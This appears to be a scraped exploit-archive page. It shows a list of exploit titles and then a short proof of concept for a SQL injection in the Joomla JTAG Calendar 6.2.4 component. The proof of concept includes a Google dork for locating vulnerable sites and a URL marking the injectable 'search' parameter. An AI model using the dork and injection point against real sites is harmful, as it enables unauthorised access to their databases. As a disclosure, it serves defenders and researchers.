893d590404
12 new exploits PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1) PHP 5.3.0 - getopt() Denial of Service PHP 5.3.0 - 'getopt()' Denial of Service Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2) PHP 4.3.x/5.0 - openlog() Buffer Overflow PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation Apple WebKit - 'HTMLFormElement::reset()' Use-After Free Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion Apple WebKit - 'HTMLKeygenElement' Type Confusion Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled Google Android - RKP Information Disclosure via s2-remapping Physical Ranges QNAP NVR/NAS - Buffer Overflow Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Privilege Escalation (1) Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2) Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2) PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit PHP 5.2.9 (Windows x86) - Local Safemod Bypass Linux udev - Netlink Privilege Escalation (Metasploit) Linux Kernel UDEV < 1.4.1 - Netlink Privilege Escalation (Metasploit) Google Android - RKP EL1 Code Loading Bypass Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes) Syntax Desktop 2.7 - (synTarget) Local File Inclusion Syntax Desktop 2.7 - 'synTarget' Parameter Local File Inclusion Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection LogoStore - 'query' Parameter SQL Injection
16 lines
No EOL
659 B
Text
Executable file
16 lines
No EOL
659 B
Text
Executable file
# Exploit Title: Joomla Component JTAG Calendar 6.2.4 - SQL Injection
|
|
# Date: 2017-1-28
|
|
# Vender Home : https://extensions.joomla.org/extension/jtag-calendar/
|
|
# Exploit Author: Persian Hack Team
|
|
# Discovered by : Mojtaba MobhaM
|
|
# Home : http://persian-team.ir/
|
|
# Tested on: Windows AND Linux
|
|
# Telegram Channel : @PersianHackTeam
|
|
# Google Dork : inurl:index.php?option=com_jtagcalendar
|
|
|
|
# POC :
|
|
# Search Parameter Vulnerable to Sql Injection
|
|
# http://Server.com/?option=com_jtagcalendar&format=raw&noframe=1&search=[SQL]&searchOnly=1
|
|
|
|
# Present to FireFighters
|
|
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members |